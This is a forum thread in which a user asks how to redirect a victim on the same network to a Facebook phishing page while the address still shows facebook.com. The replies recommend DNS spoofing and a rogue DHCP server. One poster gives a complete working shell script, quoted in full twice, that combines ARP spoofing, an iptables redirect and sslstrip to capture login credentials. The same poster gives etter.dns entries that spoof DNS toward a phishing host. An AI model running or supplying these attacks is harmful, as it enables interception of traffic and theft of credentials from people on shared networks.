Results 1 to 14 of 14

Thread: MITM redirect only when browsing specific URL?

  1. #1
    Join Date
    2013-May
    Posts
    1

    MITM redirect only when browsing specific URL?

    Hello, when I have like my facebook phisher on (se-toolkit) (victim on the same network)
    I want to be able to redirect the victim to the phisher when he visits the real facebook.
    How could I do this?? What would even be better is that if the victim is then redirected, that the URL is still facebook.com.

    Thanks in advance.
    (I'm only going to test this on myself legally)

  2. #2
    Join Date
    2013-Apr
    Posts
    126
    You need to perform a DNS spoofing attack.

  3. #3
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    why not use subterfuge and run a rogue dhcp you should get your password.
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  4. #4
    Join Date
    2013-Apr
    Posts
    126
    Quote Originally Posted by shaberu View Post
    why not use subterfuge and run a rogue dhcp you should get your password.
    It dependens, if the victim is using ssl it will not be possible to get the password...

  5. #5
    Join Date
    2013-Apr
    Posts
    32
    Try this even on ssl it will capture the password.

    script:
    #!/bin/sh
    #Created by DG Consulting Uk for the easy automation of penetration Tasks
    #copyright 2011 DG Consulting Uk
    lanIP=`ifconfig | grep "inet addr" | awk '{print $2}' | cut -d":" -f2 | sed 's/127.0.0.1//g'`
    gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`

    echo Ssl-communications sniffer v2.0
    echo Written by DeeGee
    echo copyright 2011

    echo [!] Initializing ssl attax
    ################################################## ################################################## #####
    #cleanup script
    killall ettercap
    killall arpspoof
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
    iptables --flush # just to make sure
    iptables --table nat --flush # now everything's clean
    iptables --delete-chain
    iptables --table nat --delete-chain


    ################################################## ################################################## #####

    echo -n "Enter your interface and press [Enter]: "
    read -e interface

    echo -n "Enter the target IP and press [Enter]: "
    read -e target

    ################################################## ################################################## #####

    echo "Setting up ip_forwarding: "

    echo "1" > /proc/sys/net/ipv4/ip_forward

    echo "Setting up Ip tables rule: "

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    xterm -hold -e sslstrip -l 10000 &

    xterm -hold -e tail -f sslstrip.log &

    arpspoof -i $interface -t $target $gatewayIP

    ################################################## ################

    It will need a few changes on Kali but it works flawlessly on BT5 R2/3

    Run and fix the errors if any pop up (ie) xterm -hold -e ...............may need xterm -hold....

  6. #6
    Join Date
    2013-Apr
    Posts
    32
    Alternatively you could run a simple DNS redirect using etter.dns

    etter.dns:

    target-url.com A 192.168.0.13
    www.target-url.com A 192.168.0.13

    192.168.0.13 being your ip on the lan.

    This will need a phishing page which posts data to another file and its all http instead of https

    Kind Regards Dee

  7. #7
    Join Date
    2013-Apr
    Posts
    126
    Quote Originally Posted by pentest09 View Post
    Try this even on ssl it will capture the password.

    script:
    #!/bin/sh
    #Created by DG Consulting Uk for the easy automation of penetration Tasks
    #copyright 2011 DG Consulting Uk
    lanIP=`ifconfig | grep "inet addr" | awk '{print $2}' | cut -d":" -f2 | sed 's/127.0.0.1//g'`
    gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`

    echo Ssl-communications sniffer v2.0
    echo Written by DeeGee
    echo copyright 2011

    echo [!] Initializing ssl attax
    ################################################## ################################################## #####
    #cleanup script
    killall ettercap
    killall arpspoof
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
    iptables --flush # just to make sure
    iptables --table nat --flush # now everything's clean
    iptables --delete-chain
    iptables --table nat --delete-chain


    ################################################## ################################################## #####

    echo -n "Enter your interface and press [Enter]: "
    read -e interface

    echo -n "Enter the target IP and press [Enter]: "
    read -e target

    ################################################## ################################################## #####

    echo "Setting up ip_forwarding: "

    echo "1" > /proc/sys/net/ipv4/ip_forward

    echo "Setting up Ip tables rule: "

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    xterm -hold -e sslstrip -l 10000 &

    xterm -hold -e tail -f sslstrip.log &

    arpspoof -i $interface -t $target $gatewayIP

    ################################################## ################

    It will need a few changes on Kali but it works flawlessly on BT5 R2/3

    Run and fix the errors if any pop up (ie) xterm -hold -e ...............may need xterm -hold....
    this script implements the sslstrip attack, it's does not work if the victim is using ssl by default. For example if the victim tries to login to his gmail account, if he browses to http://gmail.com the attacks will work but if he browses to https://gmail.com it will not work.
    Last edited by root-boy; 2013-05-22 at 11:13.

  8. #8
    Join Date
    2013-Apr
    Posts
    126
    Quote Originally Posted by pentest09 View Post
    Alternatively you could run a simple DNS redirect using etter.dns

    etter.dns:

    target-url.com A 192.168.0.13
    www.target-url.com A 192.168.0.13

    192.168.0.13 being your ip on the lan.

    This will need a phishing page which posts data to another file and its all http instead of https

    Kind Regards Dee
    That's the DNS spoofing attack that i was talking about.

  9. #9
    Join Date
    2013-Apr
    Posts
    32
    Quote Originally Posted by root-boy View Post
    this script implements the sslstrip attack, it's does not work if the victim is using ssl by default. For example if the victim tries to login to his gmail account, if he browses to http://gmail.com the attacks will work but if he browses to https://gmail.com it will not work.
    No if you login to facebook its https, sslstrip captures the creds same with gmail or any other https site but in the url it will show http:

  10. #10
    Join Date
    2013-Apr
    Posts
    32
    Quote Originally Posted by root-boy View Post
    That's the DNS spoofing attack that i was talking about.
    Hers a vid i did a while ago, read description for hd version
    http://blip.tv/dgconsultinguk/dns_sp...ntials-4517172
    Hope it helps..

  11. #11
    Join Date
    2013-Apr
    Posts
    126
    Quote Originally Posted by pentest09 View Post
    No if you login to facebook its https, sslstrip captures the creds same with gmail or any other https site but in the url it will show http:
    I'm not sure if you understood me correctly but read this

  12. #12
    Join Date
    2013-Apr
    Posts
    126
    What i'm trying to explain is:

    when the victim uses https from the beginning, the attack will not work. for example if the victime browses to http://gmail.com, fills the form and clicks login, normaly the victim will be redirected to https://gmail.com but in this case ssltrip will force the credentials to be send over http not https and this is the role of ssltrip. However if the victim browses to https://gmail.com and login the attack will fail because it's already a secure connection.

  13. #13
    Join Date
    2013-Apr
    Posts
    32
    Gotcha! sorry ...that was one of the reasons I used a phisher method because eset blocked the attacks but phisher method worked..hope the vid helped

  14. #14
    Join Date
    2013-Apr
    Posts
    126
    Yep thanks for the video man.

Similar Threads

  1. HTTP redirect on the fly
    By Blackhater in forum General Archive
    Replies: 0
    Last Post: 2014-03-17, 22:16
  2. Replies: 4
    Last Post: 2014-02-08, 00:42

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •